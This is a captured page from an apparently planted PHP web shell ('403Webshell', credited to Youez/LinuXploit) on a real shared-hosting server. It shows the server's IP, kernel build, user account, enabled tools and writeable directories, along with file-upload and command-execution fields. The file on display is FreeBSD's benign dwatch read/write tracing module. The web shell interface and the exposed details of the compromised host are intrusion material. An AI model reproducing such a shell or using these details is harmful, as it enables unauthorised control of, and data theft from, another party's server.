403Webshell
Server IP : 49.212.180.16  /  Your IP : 18.226.88.23
Web Server : Apache
System : FreeBSD www2606.sakura.ne.jp 13.0-RELEASE-p14 FreeBSD 13.0-RELEASE-p14 #2: Mon Dec 9 13:54:55 JST 2024 root@www5301.sakura.ne.jp:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
User : utannto ( 1076)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/libexec/dwatch/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/libexec/dwatch/read
# -*- tab-width: 4 -*- ;; Emacs
# vi: set filetype=sh tabstop=8 shiftwidth=8 noexpandtab :: Vi/ViM
############################################################ IDENT(1)
#
# $Title: dwatch(8) module for read(2), write(2), or similar entry $
# $Copyright: 2014-2018 Devin Teske. All rights reserved. $
# $FreeBSD$
#
############################################################ DESCRIPTION
#
# Display data sent/received when read(2)/write(2) occurs
#
############################################################ PROBE

case "$PROFILE" in
rw) : ${PROBE:=syscall::read:entry, syscall::write:entry} ;;
 *) : ${PROBE:=syscall::$PROFILE:entry}
esac

############################################################ ACTIONS

exec 9<<EOF
this size_t nbytes;
this string bufstr;
this string flow;
this void * buf;
this void * data;

$PROBE /* probe ID $ID */
{${TRACE:+
	printf("<$ID>");
}
	/*
	 * R/W
	 */
	this->flow = probefunc == "read" ? "<-" : "->";
	this->buf = (void *)arg1;
	this->nbytes = (size_t)arg2;

	/*
	 * Allocate temporary memory for, copy, and NUL-terminate the data
	 */
	this->data = alloca(this->nbytes + 1);
	copyinto((uintptr_t)this->buf, this->nbytes, this->data);
	bcopy("\0", (void *)((uintptr_t)this->data + this->nbytes), 1);

	/*
	 * Extract string from temporary memory
	 */
	this->bufstr = stringof(this->data);
}
EOF
ACTIONS=$( cat <&9 )
ID=$(( $ID + 1 ))

############################################################ EVENT DETAILS

if [ ! "$CUSTOM_DETAILS" ]; then
exec 9<<EOF
	/*
	 * Print read/write details
	 */
	printf("%s \"%s\" %d byte%s",
		this->flow,
		this->bufstr,
		this->nbytes,
		this->nbytes == 1 ? "" : "s");
EOF
EVENT_DETAILS=$( cat <&9 )
fi

################################################################################
# END
################################################################################

Youez - 2016 - github.com/yon3zu
LinuXploit